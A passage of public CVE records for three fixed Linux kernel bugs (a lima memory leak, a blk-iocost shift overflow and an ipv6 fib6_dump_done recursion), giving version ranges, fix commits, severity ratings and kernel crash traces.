"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "5.7"
},
{
"lessThan": "5.7",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.214",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.153",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.83",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.23",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.11",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.8.*",
"status": "unaffected",
"version": "6.8.2",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.9",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.214",
"versionStartIncluding": "5.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.153",
"versionStartIncluding": "5.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.83",
"versionStartIncluding": "5.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.23",
"versionStartIncluding": "5.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.11",
"versionStartIncluding": "5.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8.2",
"versionStartIncluding": "5.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9",
"versionStartIncluding": "5.7",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/lima: fix a memleak in lima_heap_alloc\n\nWhen lima_vm_map_bo fails, the resources need to be deallocated, or\nthere will be memleaks."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:06:19.759Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/f2e80ac9344aebbff576453d5c0290b332e187ed"
},
{
"url": "https://git.kernel.org/stable/c/746606d37d662c70ae1379fc658ee9c65f06880f"
},
{
"url": "https://git.kernel.org/stable/c/f6d51a91b41704704e395de6839c667b0f810bbf"
},
{
"url": "https://git.kernel.org/stable/c/8e25c0ee5665e8a768b8e21445db1f86e9156eb7"
},
{
"url": "https://git.kernel.org/stable/c/4ab14eccf5578af1dd5668a5f2d771df27683cab"
},
{
"url": "https://git.kernel.org/stable/c/ec6bb037e4a35fcbb5cd7bc78242d034ed893fcd"
},
{
"url": "https://git.kernel.org/stable/c/04ae3eb470e52a3c41babe85ff8cee195e4dcbea"
}
],
"title": "drm/lima: fix a memleak in lima_heap_alloc",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-35829",
"datePublished": "2024-05-17T13:41:16.290Z",
"dateReserved": "2024-05-17T12:19:12.348Z",
"dateUpdated": "2025-05-04T09:06:19.759Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-36916 (GCVE-0-2024-36916)
Vulnerability from cvelistv5
Published
2024-05-30 15:29
Modified
2025-05-20 14:27
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
blk-iocost: avoid out of bounds shift
UBSAN catches undefined behavior in blk-iocost, where sometimes
iocg->delay is shifted right by a number that is too large,
resulting in undefined behavior on some architectures.
[ 186.556576] ------------[ cut here ]------------
UBSAN: shift-out-of-bounds in block/blk-iocost.c:1366:23
shift exponent 64 is too large for 64-bit type 'u64' (aka 'unsigned long long')
CPU: 16 PID: 0 Comm: swapper/16 Tainted: G S E N 6.9.0-0_fbk700_debug_rc2_kbuilder_0_gc85af715cac0 #1
Hardware name: Quanta Twin Lakes MP/Twin Lakes Passive MP, BIOS F09_3A23 12/08/2020
Call Trace:
<IRQ>
dump_stack_lvl+0x8f/0xe0
__ubsan_handle_shift_out_of_bounds+0x22c/0x280
iocg_kick_delay+0x30b/0x310
ioc_timer_fn+0x2fb/0x1f80
__run_timer_base+0x1b6/0x250
...
Avoid that undefined behavior by simply taking the
"delay = 0" branch if the shift is too large.
I am not sure what the symptoms of an undefined value
delay will be, but I suspect it could be more than a
little annoying to debug.
References
| URL | Tags | |||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 5160a5a53c0c4ae3708959d9465ea43ad5d90542 Version: 5160a5a53c0c4ae3708959d9465ea43ad5d90542 Version: 5160a5a53c0c4ae3708959d9465ea43ad5d90542 Version: 5160a5a53c0c4ae3708959d9465ea43ad5d90542 Version: 5160a5a53c0c4ae3708959d9465ea43ad5d90542 Version: 5160a5a53c0c4ae3708959d9465ea43ad5d90542 |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L",
"version": "3.1"
}
},
{
"other": {
"content": {
"id": "CVE-2024-36916",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-06-12T19:19:24.548838Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "CWE-noinfo Not enough information",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2024-11-04T20:36:10.637Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-09-05T08:03:32.685Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/62accf6c1d7b433752cb3591bba8967b7a801ad5"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/844fc023e9f14a4fb1de5ae1eaefafd6d69c5fa1"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/f6add0a6f78dc6360b822ca4b6f9f2f14174c8ca"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/ce0e99cae00e3131872936713b7f55eefd53ab86"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/488dc6808cb8369685f18cee81e88e7052ac153b"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/beaa51b36012fad5a4d3c18b88a617aea7a9b96d"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00019.html"
},
{
"url": "https://security.netapp.com/advisory/ntap-20240905-0006/"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"block/blk-iocost.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "62accf6c1d7b433752cb3591bba8967b7a801ad5",
"status": "affected",
"version": "5160a5a53c0c4ae3708959d9465ea43ad5d90542",
"versionType": "git"
},
{
"lessThan": "844fc023e9f14a4fb1de5ae1eaefafd6d69c5fa1",
"status": "affected",
"version": "5160a5a53c0c4ae3708959d9465ea43ad5d90542",
"versionType": "git"
},
{
"lessThan": "f6add0a6f78dc6360b822ca4b6f9f2f14174c8ca",
"status": "affected",
"version": "5160a5a53c0c4ae3708959d9465ea43ad5d90542",
"versionType": "git"
},
{
"lessThan": "ce0e99cae00e3131872936713b7f55eefd53ab86",
"status": "affected",
"version": "5160a5a53c0c4ae3708959d9465ea43ad5d90542",
"versionType": "git"
},
{
"lessThan": "488dc6808cb8369685f18cee81e88e7052ac153b",
"status": "affected",
"version": "5160a5a53c0c4ae3708959d9465ea43ad5d90542",
"versionType": "git"
},
{
"lessThan": "beaa51b36012fad5a4d3c18b88a617aea7a9b96d",
"status": "affected",
"version": "5160a5a53c0c4ae3708959d9465ea43ad5d90542",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"block/blk-iocost.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "5.10"
},
{
"lessThan": "5.10",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.217",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.159",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.91",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.31",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.8.*",
"status": "unaffected",
"version": "6.8.10",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.9",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.217",
"versionStartIncluding": "5.10",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.159",
"versionStartIncluding": "5.10",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.91",
"versionStartIncluding": "5.10",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.31",
"versionStartIncluding": "5.10",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8.10",
"versionStartIncluding": "5.10",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9",
"versionStartIncluding": "5.10",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nblk-iocost: avoid out of bounds shift\n\nUBSAN catches undefined behavior in blk-iocost, where sometimes\niocg-\u003edelay is shifted right by a number that is too large,\nresulting in undefined behavior on some architectures.\n\n[ 186.556576] ------------[ cut here ]------------\nUBSAN: shift-out-of-bounds in block/blk-iocost.c:1366:23\nshift exponent 64 is too large for 64-bit type \u0027u64\u0027 (aka \u0027unsigned long long\u0027)\nCPU: 16 PID: 0 Comm: swapper/16 Tainted: G S E N 6.9.0-0_fbk700_debug_rc2_kbuilder_0_gc85af715cac0 #1\nHardware name: Quanta Twin Lakes MP/Twin Lakes Passive MP, BIOS F09_3A23 12/08/2020\nCall Trace:\n \u003cIRQ\u003e\n dump_stack_lvl+0x8f/0xe0\n __ubsan_handle_shift_out_of_bounds+0x22c/0x280\n iocg_kick_delay+0x30b/0x310\n ioc_timer_fn+0x2fb/0x1f80\n __run_timer_base+0x1b6/0x250\n...\n\nAvoid that undefined behavior by simply taking the\n\"delay = 0\" branch if the shift is too large.\n\nI am not sure what the symptoms of an undefined value\ndelay will be, but I suspect it could be more than a\nlittle annoying to debug."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-20T14:27:33.761Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/62accf6c1d7b433752cb3591bba8967b7a801ad5"
},
{
"url": "https://git.kernel.org/stable/c/844fc023e9f14a4fb1de5ae1eaefafd6d69c5fa1"
},
{
"url": "https://git.kernel.org/stable/c/f6add0a6f78dc6360b822ca4b6f9f2f14174c8ca"
},
{
"url": "https://git.kernel.org/stable/c/ce0e99cae00e3131872936713b7f55eefd53ab86"
},
{
"url": "https://git.kernel.org/stable/c/488dc6808cb8369685f18cee81e88e7052ac153b"
},
{
"url": "https://git.kernel.org/stable/c/beaa51b36012fad5a4d3c18b88a617aea7a9b96d"
}
],
"title": "blk-iocost: avoid out of bounds shift",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-36916",
"datePublished": "2024-05-30T15:29:12.745Z",
"dateReserved": "2024-05-30T15:25:07.068Z",
"dateUpdated": "2025-05-20T14:27:33.761Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-35886 (GCVE-0-2024-35886)
Vulnerability from cvelistv5
Published
2024-05-19 08:34
Modified
2025-05-04 09:07
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
ipv6: Fix infinite recursion in fib6_dump_done().
syzkaller reported infinite recursive calls of fib6_dump_done() during
netlink socket destruction. [1]
From the log, syzkaller sent an AF_UNSPEC RTM_GETROUTE message, and then
the response was generated. The following recvmmsg() resumed the dump
for IPv6, but the first call of inet6_dump_fib() failed at kzalloc() due
to the fault injection. [0]
12:01:34 executing program 3:
r0 = socket$nl_route(0x10, 0x3, 0x0)
sendmsg$nl_route(r0, ... snip ...)
recvmmsg(r0, ... snip ...) (fail_nth: 8)
Here, fib6_dump_done() was set to nlk_sk(sk)->cb.done, and the next call
of inet6_dump_fib() set it to nlk_sk(sk)->cb.args[3]. syzkaller stopped
receiving the response halfway through, and finally netlink_sock_destruct()
called nlk_sk(sk)->cb.done().
fib6_dump_done() calls fib6_dump_end() and nlk_sk(sk)->cb.done() if it
is still not NULL. fib6_dump_end() rewrites nlk_sk(sk)->cb.done() by
nlk_sk(sk)->cb.args[3], but it has the same function, not NULL, calling
itself recursively and hitting the stack guard page.
To avoid the issue, let's set the destructor after kzalloc().
[0]:
FAULT_INJECTION: forcing a failure.
name failslab, interval 1, probability 0, space 0, times 0
CPU: 1 PID: 432110 Comm: syz-executor.3 Not tainted 6.8.0-12821-g537c2e91d354-dirty #11
Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.16.0-0-gd239552ce722-prebuilt.qemu.org 04/01/2014
Call Trace:
<TASK>
dump_stack_lvl (lib/dump_stack.c:117)
should_fail_ex (lib/fault-inject.c:52 lib/fault-inject.c:153)
should_failslab (mm/slub.c:3733)
kmalloc_trace (mm/slub.c:3748 mm/slub.c:3827 mm/slub.c:3992)
inet6_dump_fib (./include/linux/slab.h:628 ./include/linux/slab.h:749 net/ipv6/ip6_fib.c:662)
rtnl_dump_all (net/core/rtnetlink.c:4029)
netlink_dump (net/netlink/af_netlink.c:2269)
netlink_recvmsg (net/netlink/af_netlink.c:1988)
____sys_recvmsg (net/socket.c:1046 net/socket.c:2801)
___sys_recvmsg (net/socket.c:2846)
do_recvmmsg (net/socket.c:2943)
__x64_sys_recvmmsg (net/socket.c:3041 net/socket.c:3034 net/socket.c:3034)
[1]:
BUG: TASK stack guard page was hit at 00000000f2fa9af1 (stack is 00000000b7912430..000000009a436beb)
stack guard page: 0000 [#1] PREEMPT SMP KASAN
CPU: 1 PID: 223719 Comm: kworker/1:3 Not tainted 6.8.0-12821-g537c2e91d354-dirty #11
Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.16.0-0-gd239552ce722-prebuilt.qemu.org 04/01/2014
Workqueue: events netlink_sock_destruct_work
RIP: 0010:fib6_dump_done (net/ipv6/ip6_fib.c:570)
Code: 3c 24 e8 f3 e9 51 fd e9 28 fd ff ff 66 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 00 f3 0f 1e fa 41 57 41 56 41 55 41 54 55 48 89 fd <53> 48 8d 5d 60 e8 b6 4d 07 fd 48 89 da 48 b8 00 00 00 00 00 fc ff
RSP: 0018:ffffc9000d980000 EFLAGS: 00010293
RAX: 0000000000000000 RBX: ffffffff84405990 RCX: ffffffff844059d3
RDX: ffff8881028e0000 RSI: ffffffff84405ac2 RDI: ffff88810c02f358
RBP: ffff88810c02f358 R08: 0000000000000007 R09: 0000000000000000
R10: 0000000000000000 R11: 0000000000000224 R12: 0000000000000000
R13: ffff888007c82c78 R14: ffff888007c82c68 R15: ffff888007c82c68
FS: 0000000000000000(0000) GS:ffff88811b100000(0000) knlGS:0000000000000000
CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
CR2: ffffc9000d97fff8 CR3: 0000000102309002 CR4: 0000000000770ef0
PKRU: 55555554
Call Trace:
<#DF>
</#DF>
<TASK>
fib6_dump_done (net/ipv6/ip6_fib.c:572 (discriminator 1))
fib6_dump_done (net/ipv6/ip6_fib.c:572 (discriminator 1))
...
fib6_dump_done (net/ipv6/ip6_fib.c:572 (discriminator 1))
fib6_dump_done (net/ipv6/ip6_fib.c:572 (discriminator 1))
netlink_sock_destruct (net/netlink/af_netlink.c:401)
__sk_destruct (net/core/sock.c:2177 (discriminator 2))
sk_destruct (net/core/sock.c:2224)
__sk_free (net/core/sock.c:2235)
sk_free (net/core/sock.c:2246)
process_one_work (kernel/workqueue.c:3259)
worker_thread (kernel/workqueue.c:3329 kernel/workqueue.
---truncated---
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-35886",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-05-20T15:12:24.428695Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-06-04T17:33:53.014Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T03:21:48.390Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/9472d07cd095cbd3294ac54c42f304a38fbe9bfe"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/9c5258196182c25b55c33167cd72fdd9bbf08985"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/fd307f2d91d40fa7bc55df3e2cd1253fabf8a2d6"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/40a344b2ddc06c1a2caa7208a43911f39c662778"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/167d4b47a9bdcb01541dfa29e9f3cbb8edd3dfd2"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/f2dd75e57285f49e34af1a5b6cd8945c08243776"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/4a7c465a5dcd657d59d25bf4815e19ac05c13061"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/d21d40605bca7bd5fc23ef03d4c1ca1f48bc2cae"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"net/ipv6/ip6_fib.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "9472d07cd095cbd3294ac54c42f304a38fbe9bfe",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "9c5258196182c25b55c33167cd72fdd9bbf08985",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "fd307f2d91d40fa7bc55df3e2cd1253fabf8a2d6",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "40a344b2ddc06c1a2caa7208a43911f39c662778",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "167d4b47a9bdcb01541dfa29e9f3cbb8edd3dfd2",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "f2dd75e57285f49e34af1a5b6cd8945c08243776",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "4a7c465a5dcd657d59d25bf4815e19ac05c13061",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "d21d40605bca7bd5fc23ef03d4c1ca1f48bc2cae",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"net/ipv6/ip6_fib.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "2.6.12"
},
{
"lessThan": "2.6.12",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.312",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.274",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.215",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.154",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.85",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.26",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.8.*",
"status": "unaffected",
"version": "6.8.5",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.9",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.312",
"versionStartIncluding": "2.6.12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.274",
"versionStartIncluding": "2.6.12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.215",
"versionStartIncluding": "2.6.12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.154",
"versionStartIncluding": "2.6.12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.85",
"versionStartIncluding": "2.6.12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.26",
"versionStartIncluding": "2.6.12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8.5",
"versionStartIncluding": "2.6.12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9",
"versionStartIncluding": "2.6.12",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nipv6: Fix infinite recursion in fib6_dump_done().\n\nsyzkaller reported infinite recursive calls of fib6_dump_done() during\nnetlink socket destruction. [1]\n\nFrom the log, syzkaller sent an AF_UNSPEC RTM_GETROUTE message, and then\nthe response was generated. The following recvmmsg() resumed the dump\nfor IPv6, but the first call of inet6_dump_fib() failed at kzalloc() due\nto the fault injection. [0]\n\n 12:01:34 executing program 3:\n r0 = socket$nl_route(0x10, 0x3, 0x0)\n sendmsg$nl_route(r0, ... snip ...)\n recvmmsg(r0, ... snip ...) (fail_nth: 8)\n\nHere, fib6_dump_done() was set to nlk_sk(sk)-\u003ecb.done, and the next call\nof inet6_dump_fib() set it to nlk_sk(sk)-\u003ecb.args[3]. syzkaller stopped\nreceiving the response halfway through, and finally netlink_sock_destruct()\ncalled nlk_sk(sk)-\u003ecb.done().\n\nfib6_dump_done() calls fib6_dump_end() and nlk_sk(sk)-\u003ecb.done() if it\nis still not NULL. fib6_dump_end() rewrites nlk_sk(sk)-\u003ecb.done() by\nnlk_sk(sk)-\u003ecb.args[3], but it has the same function, not NULL, calling\nitself recursively and hitting the stack guard page.\n\nTo avoid the issue, let\u0027s set the destructor after kzalloc().\n\n[0]:\nFAULT_INJECTION: forcing a failure.\nname failslab, interval 1, probability 0, space 0, times 0\nCPU: 1 PID: 432110 Comm: syz-executor.3 Not tainted 6.8.0-12821-g537c2e91d354-dirty #11\nHardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.16.0-0-gd239552ce722-prebuilt.qemu.org 04/01/2014\nCall Trace:\n \u003cTASK\u003e\n dump_stack_lvl (lib/dump_stack.c:117)\n should_fail_ex (lib/fault-inject.c:52 lib/fault-inject.c:153)\n should_failslab (mm/slub.c:3733)\n kmalloc_trace (mm/slub.c:3748 mm/slub.c:3827 mm/slub.c:3992)\n inet6_dump_fib (./include/linux/slab.h:628 ./include/linux/slab.h:749 net/ipv6/ip6_fib.c:662)\n rtnl_dump_all (net/core/rtnetlink.c:4029)\n netlink_dump (net/netlink/af_netlink.c:2269)\n netlink_recvmsg (net/netlink/af_netlink.c:1988)\n ____sys_recvmsg (net/socket.c:1046 net/socket.c:2801)\n ___sys_recvmsg (net/socket.c:2846)\n do_recvmmsg (net/socket.c:2943)\n __x64_sys_recvmmsg (net/socket.c:3041 net/socket.c:3034 net/socket.c:3034)\n\n[1]:\nBUG: TASK stack guard page was hit at 00000000f2fa9af1 (stack is 00000000b7912430..000000009a436beb)\nstack guard page: 0000 [#1] PREEMPT SMP KASAN\nCPU: 1 PID: 223719 Comm: kworker/1:3 Not tainted 6.8.0-12821-g537c2e91d354-dirty #11\nHardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.16.0-0-gd239552ce722-prebuilt.qemu.org 04/01/2014\nWorkqueue: events netlink_sock_destruct_work\nRIP: 0010:fib6_dump_done (net/ipv6/ip6_fib.c:570)\nCode: 3c 24 e8 f3 e9 51 fd e9 28 fd ff ff 66 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 00 f3 0f 1e fa 41 57 41 56 41 55 41 54 55 48 89 fd \u003c53\u003e 48 8d 5d 60 e8 b6 4d 07 fd 48 89 da 48 b8 00 00 00 00 00 fc ff\nRSP: 0018:ffffc9000d980000 EFLAGS: 00010293\nRAX: 0000000000000000 RBX: ffffffff84405990 RCX: ffffffff844059d3\nRDX: ffff8881028e0000 RSI: ffffffff84405ac2 